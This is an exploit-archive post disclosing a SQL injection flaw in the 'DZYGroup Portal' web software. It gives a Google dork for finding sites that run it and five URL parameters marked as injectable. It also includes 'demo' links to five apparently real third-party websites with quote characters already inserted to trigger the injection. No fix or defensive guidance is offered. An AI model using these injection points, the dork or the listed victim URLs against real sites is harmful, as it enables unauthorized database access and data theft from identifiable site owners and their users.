.__.__ .__ __ |__| | _____ __ __| |__ _____ ____ | | __ ___________ | | | / \| | \ | \\__ \ _/ ___\| |/ // __ \_ __ \ | | |_| Y Y \ | / Y \/ __ \\ \___| <\ ___/| | \/ |__|____/__|_| /____/|___| (____ /\___ >__|_ \\___ >__| \/ \/ \/ \/ \/ \/ .org ################################ Archieve an Resource About Hacking ############### #################### #################### # # Exploit Title: DZYGroup Portal Sql Injection Vulnerability # Author: Netrondoank Aka netron # home Page: http://www.ilmuhacker.org # Forum : http://www.indotek.or.id # Vendor or Software Link: http://www.dzygroup.com/portfolio.php # Version: N/A # Category:: webapps # Google dork: "Powered by DZYGroup" # Tested on: Linux Back Track 5 #################################################################### # Proof Of Concept [POC] http://site/[path]/newsDetail.asp?idNews=[Sqli] http://site/[path]/articledetail.php?id=[Sqli] http://site/[path]/prodetail.asp?Lang=EN&ID_Product=[Sqli] http://site/[path]/subcategory.asp?Lang=EN&ID_Category=22&ID_SubCategory=[Sqli] http://site/[path]/newsdetail.php?id=[Sqli] ##################################################################### # Demo http://www.kasintorn.com/en/newsDetail.asp?idNews=901 http://j-plan-motor.com/web/articledetail.php?id=%277 http://www.dzygroup.com/otherwebsite/sakaeo/EN/prodetail.asp?Lang=EN&ID_Product=%27224 http://www.starone-marketing.com/en/subcategory.asp?Lang=EN&ID_Category=22&ID_SubCategory=%2771 http://www.aubergine.in.th/en/newsdetail.php?id=27%27 ######################################################################################### #Greetz To: Allah swt .free dom For Palestine .Indonesiansecurity.info, 1337day.com packetstormsecurity.org, Exploit-id.com ,securityreason.com ,securityfocus.com ########################################################################################## ############################### Archieve an Resource About Hacking--Ilmuhackerdotorg ####